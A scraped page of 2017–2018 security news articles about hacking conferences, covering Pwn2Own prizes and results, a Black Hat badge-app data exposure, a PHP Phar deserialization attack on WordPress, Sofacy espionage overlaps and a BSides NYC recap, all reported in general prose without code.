- Congress -

Last update 10.09.2017 14:33:08

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5 



IoT Category Added to Pwn2Own Hacking Contest
5.9.2018 securityweek  Congress

This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.

The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.

Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.

In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.

In the web browsers category, security experts can receive a cash prize of $25,000 for hacking the default browser on Huawei P20, Xiaomi Mi6, and Samsung Galaxy S9, and $50,000 for a successful exploit against the browsers running on Apple’s iPhone X, and Google’s Pixel 2.

In the short distance category, which includes Wi-Fi, Bluetooth, and near field communication (NFC), ZDI is offering up to $30,000 and up to $60,000 – exploits targeting devices from Apple and Google are worth the higher amount.

Hacking a device simply by sending it a SMS/MMS message or getting its owner to view a message can earn Pwn2Own Tokyo contestants as much as $75,000.

The highest rewards are offered this year for baseband attacks, which involve the target device communicating with a rogue base station. Researchers can get up to $50,000 for a successful exploit against Huawei, Xiaomi and Samsung devices, and up to $150,000 for hacking Apple and Google phones.

Pwn2Own Tokyo prizes

In the browser and short-range categories, participants can earn an extra $20,000 if their exploit payload is executed with kernel privileges. There is also a persistence bonus for these categories: $50,000 if the exploit survives a reboot on an iPhone X, and $25,000 if it survives a reboot on a Pixel 2.

Registration for Pwn2Own Tokyo closes on November 7 at 5:00 p.m. Japan Standard Time.

At last year’s event, hackers earned more than half a million dollars after successfully demonstrating exploits against the Samsung Galaxy S8, the Apple iPhone 7 and the Huawei Mate 9 Pro. No attempts were made against the Google Pixel.


Badge Reading App Exposed Details of Black Hat Conference Attendees
21.8.2018 securityweek Congress

A researcher discovered that a vulnerability in the badge reading app used at the recent Black Hat security conference exposed the registration details of all attendees.

The badges provided to people attending Black Hat and other conferences contain an NFC tag. When vendors scan the tag, they obtain the information provided during the registration process by the individual wearing the badge.

At Black Hat the tag was scanned using BCARD, a trade-show and conference badge reading application developed by ITN International. The app is designed to work on tablets and phones running Android or iOS.

Vulnerability in BCARD conference badge scanning app

A researcher who uses the online moniker “NinjaStyle” analyzed the BCARD application and discovered an API that could be used to obtain an attendee’s data without authentication based on the unique badgeID value assigned to each user.

NinjaStyle then conducted some tests to determine if a brute-force attack could be used to obtain information on all Black Hat attendees.

“After trying a few hundred requests on both 0-100000 and 000000-100000 and receiving no valid badges, I determined that those were likely not going to be valid ID ranges. We could then assume that valid IDs are 100000-999999. This leaves us with 900,000 total requests. With an estimated 18,000 BlackHat attendees, we can then assume that we will enumerate a valid badgeID in approximately 2% of our requests,” the researcher wrote in a blog post published on Monday.

He determined that a brute-force attack on the API would allow an attacker to obtain the names, email addresses, company names, phone numbers and addresses of all Black Hat attendees in roughly six hours.

The researcher reported his findings to ITN on August 9 and while he initially encountered some difficulties in establishing contact with the company, the issue was patched by August 13. ITN said it had addressed the vulnerability by disabling the problematic API, which it claimed had been a legacy system.

This is not the first time experts have found vulnerabilities in one of the apps used at the Black Hat conference. Back in 2016, the event’s organizers were forced to update the official application after researchers discovered several flaws that could have been exploited to impersonate users and spy on them.

Also in 2016, researchers found that the badge scanning application provided by RSA Conference organizers to vendors had been affected by a security bypass flaw caused by a default password left in the code.


Black Hat 2018 – Expert demonstrated a new PHP code execution attack
17.8.2018 securityaffairs Congress

The security researcher Sam Thomas from Secarma, has discovered a new attack technique that leverages critical deserialization vulnerabilities in PHP programming language.
The flaws potentially expose web applications written in the popular language to cyber attacks, including websites running CMSs like WordPress and Typo3.

The expert discovered that an attacker can use low-risk functions against Phar archives to trigger deserialization attack without requiring the use of unserialize() function. Phar archives are similar to Java JAR archives but are specific for PHP applications. A Phar application or library could be distributed in a single file.

Phar files include metadata in a serialized format. The data is unserialized for every file operation function (fopen, file_exists, file_get_contents, etc.) on the archive file.

“Typically, these archives are used to hold self-extracting or self-contained applications, in the same
way that a Jar archive can be executed a Phar archive contains an executable stub containing PHP
code. To get to the crux of the issue at hand, Phar archives can also contain meta-data, and:
“Meta-data can be any PHP variable that can be serialized.” wrote Thomas.

This meta-data is unserialized when a Phar archive is first accessed by any(!) file operation. This
opens the door to unserialization attacks whenever a file operation occurs on a path whose
beginning is controlled by an attacker. This is true for both direct file operations (such as
“file_exists”) and indirect operations such as those that occur during external entity processing
within XML (i.e. when an XXE vulnerability is being exploited).”

Thomas demonstrated at the Black Hat hacking conference how to trigger the flaws to hack WordPress sites using an author account and take full control over the underlying web server.

An attacker could trigger the flaws by uploading a specially crafted Phar archive containing a malicious payload onto the target’s local file system and then access it using the “phar://” stream wrapper.
Thomas explained that it is possible to carry out the attack by converting a Phar archive in a JPEG image, an operation that is possible by modifying its first 100 bytes.

“The way certain thumbnail functionality within the application works enables an attacker with the
privileges to upload and modify media items to gain sufficient control of the parameter used in a
“file_exists” call to cause unserialization to occur.” explained the researcher.

“The core vulnerability is within the wp_get_attachment_thumb_file function in /wpincludes/post.php:”

PHP hacking

Once uploaded the malicious thumbnail on the targeted server running the WordPress website the attacker can use another function to call the image file as a Phar archive using the “phar://” stream wrapper.

“It is possible to reach this function through an XMLRPC call to the “wp.getMediaItem” method, with
an arbitrary value for $imagedata[‘thumb’] and a partially controlled value for $file.
$file is returned by get_attached_file also from /wp-includes/post.php” continues the analysis.

A remote authenticated attacker that is in position to create/edit posts can upload a malicious image and execute arbitrary PHP code the target system.
Thomas reported his findings to the WordPress security team on 28th February 2017l. WordPress released a security update that did not solve the problem completely.

The researcher also reported the flaw to Typo3 on 9th June 2018, and the issue was fixed with the release of the versions 7.6.30, 8.7.17 and 9.3.


Hackers awarded $267,000 at Pwn2Own 2018, was far less than in the past editions
18.3.2018 securityaffairs Congress

At Pwn2Own 2018 the hackers received a total of $267,000, it was far less than in the past editions, but the quality of research was amazing.
The popular hacking competition Pwn2Own is concluded, let’s see how much hackers earned and which applications they have successfully pwned.

White hat hackers have earned a total of $267,000 at Pwn2Own 2018 competition for exploits targeting Microsoft Edge, Apple Safari, Oracle VirtualBox and Mozilla Firefox.

This year the popular competition organized by TrendMicro Zero Day Initiative was sponsored by Microsoft and sponsor VMware.

The overall prize pool announced by ZDI was $2 million, but only a total of $267,000 was awarded by the hackers.

The overall amount was less than in the past years, in 2017 white hackers earned $833,000, $460,000 in 2016) and $552,500 in 2015.

“Overall, we awarded $267,000 over the two-day contest while acquiring five Apple bugs, four Microsoft bugs, two Oracle bugs, and one Mozilla bug.” states the organization.

“While smaller than some of our previous competitions, the quality of research was still extraordinary and highlights the difficulty in producing fully-functioning exploit for modern browsers and systems.”

On the first day, hackers earned a total of $162,000 USD and 16 points towards Master of Pwn. The white hat hacker Richard Zhu, aka fluorescence, failed to hack Safari, but he successfully used an exploit chain against Edge earning $70,000.

The hacker Niklas Baumstark from the Phoenhex team was awarded with $27,000 for hacking VirtualBox and the expert Samuel Groß, aka saelo, of Phoenhex received $65,000 for hacking Safari.

“The first day of Pwn2Own 2018 has come to a close, and so far, we’ve awarded $162,000 USD and 16 points towards Master of Pwn. Today saw 2 successful attempts, 1 partial success, and 1 failure. In total, we purchased 3 Apple bugs, 2 Oracle bugs, and 3 Microsoft bugs.” states the official site of the competition.

PWN2OWN 2018

On the second day, the hackers earned a total of $105,000 USD and 11 more Master of Pwn points awarded.

Richard Zhu earned $50,000 for hacking Firefox with a Windows kernel EoP. He chained an out-of-bounds (OOB) write in the browser followed by an integer overflow in the Windows kernel.

Zhu was the star of the Pwn2Own 2018, he won the Master of Pwn award this year receiving a total of $120,000 and 65,000 ZDI reward points worth roughly $25,000.

“The day started with the return of Richard Zhu (fluorescence), this time targeting Mozilla Firefox with a Windows kernel EoP. He eschewed all drama today and successfully popped Mozilla Firefox on his first attempt.” states the post published on Day 2 of the Pwn2Own 2018.

“He used an out-of-bounds (OOB) write in the browser followed by an integer overflow in the Windows kernel to earn himself another $50,000 and 5 more Master of Pwn points. This brings his event total to $120,000 and a commanding lead for Master of Pwn.”

On the same day, white hackers Markus Gaasedelen (gaasedelen), Nick Burnett (itszn13), and Patrick Biernat of Ret2 Systems, Inc. targeted Apple Safari with a macOS kernel EoP.

At the fourth attempt, they successfully demonstrated their exploit but Pwn2Own rules state that the exploit must be demonstrated in a maximum of three attempts.

They were not awarded but Zero Day Initiative (ZDI) did purchase the vulnerabilities and disclosed them to Apple.

The last entry for the day saw a team from MWR labs, composed of Alex Plaskett (AlaxJPlaskett), Georgi Geshev (munmap), and Fabi Beterke (pwnfl4k3s), successfully targeting Apple Safari with a sandbox escape.

The same team earned $55,000 for a Safari sandbox escape obtaining a heap buffer underflow in the browser and an uninitialized stack variable in macOS.


Hackers Awarded $267,000 at Pwn2Own 2018
16.3.2018 securityweek Congress

White hat hackers have earned a total of $267,000 at this year’s Pwn2Own competition for exploits targeting Microsoft Edge, Apple Safari, Oracle VirtualBox and Mozilla Firefox.

On the first day, Richard Zhu (aka fluorescence) failed to hack Safari, but he did demonstrate an exploit chain against Edge, which earned him $70,000. Niklas Baumstark from the Phoenhex team received $27,000 for hacking VirtualBox, while Samuel Groß (aka saelo) of Phoenhex earned $65,000 for hacking Safari.

Richard Zhu wins Pwn2Own 2018

On the second day of Pwn2Own 2018, Zhu earned $50,000 for hacking Firefox with an out-of-bounds read flaw in the browser and an integer overflow in the Windows kernel. Zhu actually won this year’s Master of Pwn award, taking home a total of $120,000 and 65,000 ZDI reward points worth roughly $25,000.

Employees of Ret2 Systems demonstrated an exploit chain targeting Safari, but they were successful only on the fourth attempt. Since Pwn2Own rules state that the exploit must be demonstrated in a maximum of three attempts, they did not win any money as part of the contest, but the Zero Day Initiative (ZDI) did purchase the vulnerabilities and disclosed them to Apple via its regular process.

Finally, a team from MWR Labs earned $55,000 for a Safari sandbox escape. They used a heap buffer overflow in Safari and an uninitialized stack variable in macOS to execute arbitrary code.

Pwn2Own 2018 was backed by Microsoft and VMware, and ZDI announced a prize pool of $2 million. The total of $267,000 awarded at the event was far less than in the past years when researchers earned $833,000 (2017), $460,000 (2016) and $552,500 (2015).

ZDI noted that some of the experts who had registered for the event were forced to withdraw due to various reasons, including the fact that Microsoft’s latest updates patched the vulnerabilities they had planned on using.

“While smaller than some of our previous competitions, the quality of research was still extraordinary and highlights the difficulty in producing fully-functioning exploit for modern browsers and systems,” ZDI said.

The highest prizes at Pwn2Own 2018 were offered by Microsoft, including for the Hyper-V client ($150,000), Outlook ($100,000), and Windows SMB ($100,000). The company also offered a total of more than $800,000 for exploits targeting Windows Defender Application Guard for Edge, Windows SMB, and the Hyper-V client running on the latest Windows Insider Preview for Business on a Surface Book 2 device.


Edge, VirtualBox, Safari Hacked at Pwn2Own 2018
15.3.2018 securityweek Congress

White hats managed to hack Microsoft Edge, Apple Safari and Oracle VirtualBox on the first day of the Pwn2Own 2018 competition taking place these days alongside the CanSecWest conference in Vancouver, Canada.

There were only four entries on the first day of Pwn2Own 2018. First, Richard Zhu (aka fluorescence) attempted to perform a sandbox escape on Apple’s Safari web browser, but failed to do it in the 30-minute time slot. He did, however, manage to hack Microsoft Edge using two use-after-free bugs in the browser and an integer overflow in the Windows kernel. This attempt, which involved reworking his exploit on the spot, earned him $70,000.

Niklas Baumstark from the Phoenhex team had a partially successful entry against Oracle VirtualBox. While he did manage to execute code using out-of-bounds read and time of check to time of use (TOCTOU) bugs, he was awarded only $27,000 of the maximum of $35,000.

Finally, Samuel Groß (aka saelo) of the Phoenhex team earned $65,000 for executing code in Safari using a JIT optimization bug in the web browser, a logic flaw in macOS, and a kernel overwrite vulnerability.

Only three attempts are scheduled for the second day of the event, including two that target Safari and one that targets Mozilla Firefox. Contestants earned a total of $162,000 on the first day, and they will probably not earn much more on the second day, unless their exploits include a virtual machine escape via a kernel privilege escalation vulnerability, for which there is a bonus of $50,000-$70,000.

In comparison, last year’s event had roughly 30 entries and spanned across three days. Contestants earned more than $800,000 for a record-breaking 51 vulnerabilities.

The Zero Day Initiative (ZDI), which organizes Pwn2Own, said the number of white hat hackers that registered was initially higher, but some of them were forced to withdraw from the competition for various reasons, including due to their vulnerabilities being patched by Microsoft with the latest security updates.

ZDI announced in January a prize pool of $2 million for Pwn2Own 2018, which is backed by Microsoft and VMware.

While the Edge browser was hacked on the first try, Microsoft seems happy that contestants could not escape its Windows Defender Application Guard (WDAG) isolation protection. Escaping the WDAG container could have earned researchers between $10,000 and $250,000 at Pwn2Own.


Sofacy Attacks Overlap With Other State-Sponsored Operations

12.3.2018 securityweek Congress

Kurt Baumgartner details latest Sofacy attacks at Kaspersky SAS

CANCUN - KASPERSKY SECURITY ANALYST SUMMIT - Attacks carried out by a Russian threat group appear to overlap with campaigns conducted by other cyberspies, including ones linked by researchers to China and the United States.

Kaspersky Lab revealed last month that the Russian threat actor known as Sofacy, APT28, Fancy Bear, Pawn Storm, Sednit and Strontium had shifted its focus from NATO member countries and Ukraine to Central Asia and further east, including China.

On Friday, at Kaspersky’s Security Analyst Summit (SAS), researcher Kurt Baumgartner revealed that the group appears to be particularly interested in military, defense and diplomatic entities in the far east.

Baumgartner also revealed that the attacks launched by Sofacy sometimes overlap with the operations of other state-sponsored cyberspies in terms of victims.

For instance, researchers discovered Sofacy’s Zerbrocy malware on machines that had also been compromised by Mosquito, a backdoor associated with Turla, a different threat actor linked to Russia. Shared victims include diplomatic and commercial organizations in Europe and Asia.

Sofacy’s SPLM malware (aka CHOPSTICK and X-Agent) was found on devices that had also been infected with other Turla malware, which often precedes SPLM.

SPLM has also been spotted on the same systems as malware known to have been used by a China-linked actor known as Danti.

According to Kaspersky, overlaps were generally found on systems belonging to government, technology, science, and military organizations in or based in Central Asia.

Another interesting overlap was between Sofacy and the English-speaking Lamberts group, which is also known as Longhorn. Security firms revealed last year that this cyber espionage group had been using some of the Vault 7 tools leaked by WikiLeaks. These tools are believed to have been developed and used by the U.S. Central Intelligence Agency (CIA).

Kaspersky said it had identified Sofacy backdoors and malware associated with the Lamberts, specifically Grey Lambert, on a server belonging to a military and aerospace conglomerate in China.

Researchers admit, however, that the presence of both Lamberts and Sofacy malware on the server could simply mean that the former planted a false flag, considering that the original delivery vector for the Sofacy tool remains unknown. It’s also possible that the Russian group exploited a previously unknown vulnerability, or that it somehow harnessed the Grey Lambert malware to download its own tools. The most likely scenario, according to experts, is that the Sofacy malware was delivered using an unknown PowerShell script or a legitimate app in which the attackers discovered a flaw.

“Sofacy is sometimes portrayed as wild and reckless, but as seen under our visibility, the group can be pragmatic, measured and agile. Their activity in the East has been largely under-reported, but they are clearly not the only threat actor interested in this region, or even in the same targets,” Baumgartner said. “As the threat landscape grows ever more crowded and complex, we may encounter more examples of target overlap and it could explain why many threat actors check victim systems for the presence of other intruders before fully launching their attacks.”

Kaspersky recently spotted the SPLM malware being used in an attack aimed at major air defense organization in China, while the Zebrocy tool has been used in high volume campaigns targeting entities in Armenia, Turkey, Tajikistan, Kazakhstan, Afghanistan, Mongolia, Japan and China.


BSides NYC, a volunteer organized event put on by and for the community
7.2.2018 Kaspersky  Congress
Another edition of BSides NYC has passed, and as first time attendee and presenter, I was genuinely impressed with the impeccable organization, the content shared, and the interesting conversations that took place among enthusiasts and professionals from all over the world. I’ve been a long time follower and supporter of BSides events in Latin America, mainly due to the fact that they offer a relaxed venue for sharing and learning about the newest topics in information security, all while bringing together people from different backgrounds in a community-driven event.

This year’s edition of BSides NYC took place at the John Jay College of Criminal Justice, with faculty member and the deputy CISO of the City of New York opening the event along some additional memorable keynotes given by Runa Sandvik from the New York Times, and Amber Baldet from JP Morgan. Once the initial kick-off was done, each attendee was able to choose from two technical tracks, an entrepreneur track, or any of the available villages and workshops. It was certainly tough for everyone how to decide where to spend their time, taking a coffee break here and there to meet and greet colleagues, friends, and keep enjoying all the activities happening around.

After lunch, I began my presentation on “Threat hunting .NET malware with YARA”, giving some examples of how to use YARA and the newly added .NET module, particularly useful for tracking the growing number of malware relying on Microsoft’s flagship framework. For learning purposes I chose a very popular malware targeting Latin American ATMs named Ploutus, which has landed in US territory just recently. It was quite an experience to fit an entire day of YARA content in less than an hour, but fortunately everyone at the presentation was extremely supportive, whether they have been using the tool since the beginning or never heard about it before.

From https://twitter.com/mathmare_/status/954786901621387264

Then it was the turn for Dmitry Bestuzhev, Director of Kaspersky Lab’s Global Research and Analysis Team in Latin America, who gave an astonishing presentation titled “Moving like a Spook through Walls Or how to be only a shadow for APT detectors”. It’s always interesting to observe how the community sees the Latin American threat landscape, which sometimes would seem as it’s not getting the attention it deserves. There wasn’t enough room in the auditorium to fit all the people interested in the talk, however since coffee and pastries were waiting for us after the presentation, the conversation could be continued with all of those that were eager to keep the debate open.

From https://twitter.com/pentest_it/status/954789778528096256

The biggest surprise for me was the addition of an entrepreneur track, something that undoubtedly every attendee was thankful for. Sometimes we are guilty of getting lost in the technical side of things, forgetting about the business and how to actually make our idea reach the audience we want it to. There were presentations from different startups, and remarkable information on how to grow your business, monetize it, and ultimately how not to lose sight of your original concept or idea even when dealing with venture capitals and external pressures.

It’s one of those events that you can’t miss, whether it’s playing the custom capture the flag game with your team, building weird antennas in the hacking village, or participating in any of the tracks, you’ll find something in BSides NYC for you. Oh, and don’t forget, there’s always conference swag!


New Targets, $2 Million in Prizes Announced for Pwn2Own 2018
25.1.2018 securityweek Congress

Trend Micro’s Zero Day Initiative (ZDI) announced on Thursday that this year’s Pwn2Own hacking competition offers $2 million in cash and prizes, with several new pieces of software added to the list of targets.

Pwn2Own 2018 is scheduled to take place on March 14-16 alongside the CanSecWest conference in Vancouver, Canada. This year, ZDI has partnered with Microsoft for the event, and VMware has been announced as a sponsor.

This year’s categories are virtualization, web browsers, enterprise applications, servers, and the Windows Insider Preview challenge.

In the virtualization category, Pwn2Own 2018 introduces a new target, namely Oracle VirtualBox. Researchers can earn $35,000 and a $30,000 bonus if they can execute a privilege escalation via a Windows kernel vulnerability on the host. The base prize for VMware Workstation is $70,000 and for Microsoft Hyper-V it’s $150,000.

All major web browsers are targeted at Pwn2Own 2018. A sandbox escape can earn contestants $60,000 if it works on Chrome or Edge, $55,000 on Safari, and $40,000 on Firefox. Hackers can earn a bonus of $50,000-$70,000 if they combine their exploit with a virtual machine escape via a kernel privilege escalation vulnerability.

The targeted apps in the enterprise category are Adobe Reader, with a maximum prize of $90,000, Office 365 ProPlus, with a maximum prize of $50,000, and Microsoft Outlook, for which organizers are prepared to pay out up to $100,000. This will be the first time Outlook is a target at Pwn2Own.

In the servers category, there are no less than three new targets, including NGINX, Microsoft Windows SMB, and OpenSSL. Apache Web Server, the only target in this category in last year’s event, will remain on the list. Vulnerabilities in each of these pieces of software can earn researchers up to $100,000.

Since Microsoft is a partner of Pwn2Own 2018, it has asked ZDI to introduce a special category for some of its flagship pre-release security technologies in the latest Windows Insider Preview for Business running on Surface Book 2 devices.

Targets include Windows Defender Application Guard for Edge, Windows SMB, and the Windows Hyper-V client. Prizes range between $10,000 and $250,000.

As always, the contestant or team with the highest number of Master of Pwn points will earn 65,000 ZDI reward points, which are worth roughly $25,000. In addition, the first-round winner for each category can win a laptop.

At Pwn2Own 2017, ZDI paid out a total of $833,000 for 51 vulnerabilities, nearly double than the $460,000 earned by hackers in the previous year for only 21 new flaws. Given that this year’s prize pool is $2 million, double than what organizers offered last year, we can expect some interesting exploits.


Smartphone Exploits Earn Hackers Over $500,000
2.11.2017 securityweek  Congress
White hat hackers earned more than half a million dollars at this year’s Mobile Pwn2Own competition after successfully demonstrating exploits against Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.

The hacking contest, organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo, Japan, offered more than $500,000 for exploit chains targeting browsers, short distance communications (Wi-Fi, Bluetooth and NFC), messaging, and baseband components in the Google Pixel, Galaxy S8, iPhone 7 and Mate 9 Pro.

All devices had been running the latest versions of the software and operating systems – Apple, Google and Huawei released patches the night before the event started.

On the first day, participants earned a total of $350,000 for disclosing vulnerabilities that allow attacks against Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

On the second day, MWR Labs earned $25,000 for hacking Google Chrome of the Mate 9 Pro via 5 logic bugs in Huawei apps that allowed a browser sandbox escape and data exfiltration.

The same team took home an additional $25,000 after exploiting 11 flaws across six different apps to hack Internet Browser on the Galaxy S8. The exploit resulted in arbitrary code execution and sensitive data leakage.

A researcher from China-based Qihoo 360 earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component. The exploit worked properly, but one of the three vulnerabilities it leveraged had been previously disclosed at Pwn2Own by a different contestant. The same Chinese expert was awarded another $25,000 for hacking Safari on the iPhone 7.

The last entry came from the researcher Amat Cama (aka Acez), who earned $50,000 for a baseband exploit targeting the Galaxy S8. The exploit relied on a stack-based buffer overflow that allowed arbitrary code execution.

The total amount of money paid to researchers over the course of two days at Mobile Pwn2Own 2017 was $495,000. The Tencent Keen Security Lab team got the highest number of Master of Pwn points, which also earned them 65,000 ZDI reward points, worth roughly $25,000.

Mobile Pwn2Own 2017 results

Mobile Pwn2Own 2017 results

While one successful entry did target the Chrome browser, no one has attempted to demonstrate an exploit on Google’s Pixel phone.

Affected vendors have been provided the details of the vulnerabilities used at the event and ZDI will give them 90 days to release fixes before a limited advisory describing the flaws will be made public.


White hat hackers earn over $500,000 for mobile exploits at Mobile Pwn2Own 2017 competition
2.11.2017 securityaffairs Congress

Let’s see what has happened at Mobile Pwn2Own 2017 competition organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo.
Here we are discussing once again of the Mobile Pwn2Own competition organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo.

White hat hackers earned more than half a million dollars at Mobile Pwn2Own 2017 competition devising successfully exploits against popular smartphones running the latest versions of OSs.

Major vendors, including Apple, Google and Huawei released patches the night before the event started.

The exploits target browsers, short distance communications (Wi-Fi, Bluetooth, and NFC), messaging, and baseband components in the mobile devices, including Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.


Participants earned a total of $350,000 for triggering vulnerabilities in Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

“The first day of Mobile Pwn2Own 2017 has come to a close, and we’ve awarded a total of $350,000 and 55 Master of Pwn points. Today saw five successful attempts and two failed attempts as the ZDI program acquired 11 bugs for the Samsung Galaxy S8, Apple iPhone 7, and the Huawei Mate9 Pro.” states ZDI blog post.

There were also failures, for example the Tencent Keen Security Lab (@keen_lab) targeting the Samsung Internet Browser on the Samsung Galaxy S8 failed as they could not get their exploit chain to work within the allotted time.

Fortunately, the same team demonstrated a successful WiFi exploit on the Apple iPhone 7.

“They used a total of four bugs to gain code execution and escalate privileges to allow their rogue application to persist through a reboot. They earned $60,000 for the WiFi exploit and added $50,000 for the persistence bonus – a total of $110,000 and 11 Master of Pwn points. This screenshot may not look like much, but all it took was connecting to a WiFi network to get the “KeenLab” app to appear.” continues ZDI.

Day Two
On the second day, experts with the MWR Labs earned $25,000 for hacking Google Chrome of the Mate 9 Pro via 5 logic flaws in Huawei apps that them to escape the browser sandbox and exfiltrate data.

MWR Labs hackers also earned $25,000 after exploiting 11 vulnerabilities across six different apps to hack Internet Browser on the Galaxy S8, they triggered the flaws to remotely execute arbitrary code and force sensitive data leakage.

A researcher from China-based Qihoo 360 (@mj0011sec) earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component, later he was awarded another $25,000 for hacking Safari on the iPhone 7.

The total amount of money paid to participants at Mobile Pwn2Own 2017 was $495,000, The Tencent Keen Security Lab team obtained the highest number of Master of Pwn points.

What’s next?

The ZDI already reported to the vendor the details of the vulnerabilities exploited during the contest. Vendors have 90 days to release fixes before a limited advisory describing the flaws will be made public.


Smartphone Exploits Earn Hackers Over $500,000
2.11.2017 securityaffairs  Congress
White hat hackers earned more than half a million dollars at this year’s Mobile Pwn2Own competition after successfully demonstrating exploits against Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.

The hacking contest, organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo, Japan, offered more than $500,000 for exploit chains targeting browsers, short distance communications (Wi-Fi, Bluetooth and NFC), messaging, and baseband components in the Google Pixel, Galaxy S8, iPhone 7 and Mate 9 Pro.

All devices had been running the latest versions of the software and operating systems – Apple, Google and Huawei released patches the night before the event started.

On the first day, participants earned a total of $350,000 for disclosing vulnerabilities that allow attacks against Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

On the second day, MWR Labs earned $25,000 for hacking Google Chrome of the Mate 9 Pro via 5 logic bugs in Huawei apps that allowed a browser sandbox escape and data exfiltration.

The same team took home an additional $25,000 after exploiting 11 flaws across six different apps to hack Internet Browser on the Galaxy S8. The exploit resulted in arbitrary code execution and sensitive data leakage.

A researcher from China-based Qihoo 360 earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component. The exploit worked properly, but one of the three vulnerabilities it leveraged had been previously disclosed at Pwn2Own by a different contestant. The same Chinese expert was awarded another $25,000 for hacking Safari on the iPhone 7.

The last entry came from the researcher Amat Cama (aka Acez), who earned $50,000 for a baseband exploit targeting the Galaxy S8. The exploit relied on a stack-based buffer overflow that allowed arbitrary code execution.

The total amount of money paid to researchers over the course of two days at Mobile Pwn2Own 2017 was $495,000. The Tencent Keen Security Lab team got the highest number of Master of Pwn points, which also earned them 65,000 ZDI reward points, worth roughly $25,000.

Mobile Pwn2Own 2017 results

Mobile Pwn2Own 2017 results

While one successful entry did target the Chrome browser, no one has attempted to demonstrate an exploit on Google’s Pixel phone.

Affected vendors have been provided the details of the vulnerabilities used at the event and ZDI will give them 90 days to release fixes before a limited advisory describing the flaws will be made public.


Samsung, Apple, Huawei Phones Hacked at Mobile Pwn2Own
1.11.2017 securityweek Congress
Researchers have managed to hack the Samsung Galaxy S8, the iPhone 7 and the Huawei Mate 9 Pro on the first day of the Mobile Pwn2Own 2017 competition taking place alongside the PacSec conference in Tokyo, Japan.

The prize pool for the event organized by Trend Micro’s Zero Day Initiative (ZDI) exceeds $500,000 and participants have already earned a significant chunk on the first day.

The day started with an attempt from Tencent Keen Security Lab to demonstrate an exploit against the Internet Browser on a Samsung Galaxy S8. The attempt could have earned them $70,000, but it failed.

However, a researcher from the Chinese security firm Qihoo360 did manage to hack the Internet Browser on the Galaxy S8 (with persistence) and take home the $70,000. The expert achieved code execution in the browser and exploited a privilege escalation in a different Samsung app for persistence after a reboot.

As for attacks targeting Apple’s iPhone 7 with iOS 11.1, the Tencent Keen Security Lab team earned $110,000 for a total of four vulnerabilities allowing code execution via Wi-Fi and privilege escalation for persistence through a reboot. The same team earned an additional $45,000 for hacking Safari on the iPhone 7.

Richard Zhu, aka fluorescence, earned $20,000 for a Safari exploit on an iPhone 7 and a sandbox escape.

The Tencent Keen Security Lab team also took a crack at the Huawei Mate 9 Pro. Researchers failed to hack the device’s NFC system, but they did manage to develop an exploit targeting the Android phone’s baseband, which earned them $100,000.

This brings the total earned by participants on the first day of Mobile Pwn2Own 2017 to $345,000.

No one has attempted to hack Google’s Pixel phone or the company’s Chrome browser on the first day, but there are six more hacking attempts scheduled for the second day of the event.

The vulnerabilities exploited at the competition will be disclosed to Apple, Google, Samsung and Huawei, and they will be given 90 days to release a fix before limited details about the flaws are made public by ZDI.


Over $500,000 Up For Grabs at Mobile Pwn2Own 2017 Hacking Competition

30.8.2017 securityweek Congress
Trend Micro this week said that it will offer over $500,000 in cash prizes at Zero Day Initiative’s Mobile Pwn2Own contest, set to take place Nov. 1-2, during the PacSec 2017 Conference in Tokyo, Japan.

The sixth annual Mobile Pwn2Own competition will have four different targets available, namely Google Pixel, Samsung Galaxy S8, Apple iPhone 7, and Huawei Mate9 Pro, and will allow contestants to compete in four categories, including Browsers, Short Distance and WiFi, Messaging, and Baseband.

Security researchers and hackers will be encouraged to demonstrate and disclose zero-day attacks against up-to-date (fully patched) mobile platforms. Should a new version of these phones become available in time to be integrated into the contest, Trend Micro and the Zero Day Initiative will work to add it as an available target platform.

In the Mobile Browser category, hackers and researchers will target Google Chrome, Apple Safari, and the Samsung Internet Browser, competing for prizes of $50,000, $40,000, and $30,000, respectively. In the Short Distance and WiFi category, attacks happening over Bluetooth, near field communication (NFC), or WiFi will be accepted, prized $40,000, $50,000, and $60,000, respectively.

Contestants in the messaging category will be able to submit SMS or MMS exploits, each worth $60,000 of cash. Those competing in the Baseband category can win $100,000--the biggest prize in the competition.

“Following the contest, vendors will have 90 days to produce patches for these bugs, instead of the standard 120 disclosure window. This reflects the integrity of successful exploits produced during the contest. As these are practical vulnerabilities with demonstrated applications, a shortened patch window helps provide quicker protection for the end user against potentially damaging bugs,” Trend Micro notes.

The security firm also announced that successful entries will also receive "Master of Pwn" points and the device itself for each attempt. The tradition of crowning a Master of Pwn will return this year, Trend Micro’s Brian Gorenc points out.

Gorenc also says that successful attempts will be eligible for a series of Add-on Bonuses, including a Kernel Bonus (the exploit payload must execute with kernel-level privileges) consisting of an extra $20,000 and an additional 3 Master of Pwn points, and a Persistence Bonus (the exploit payload can survive a reboot of the device), consisting of an additional $50,000 for iOS / $40,000 for Android, and an additional 3 Master of Pwn points.

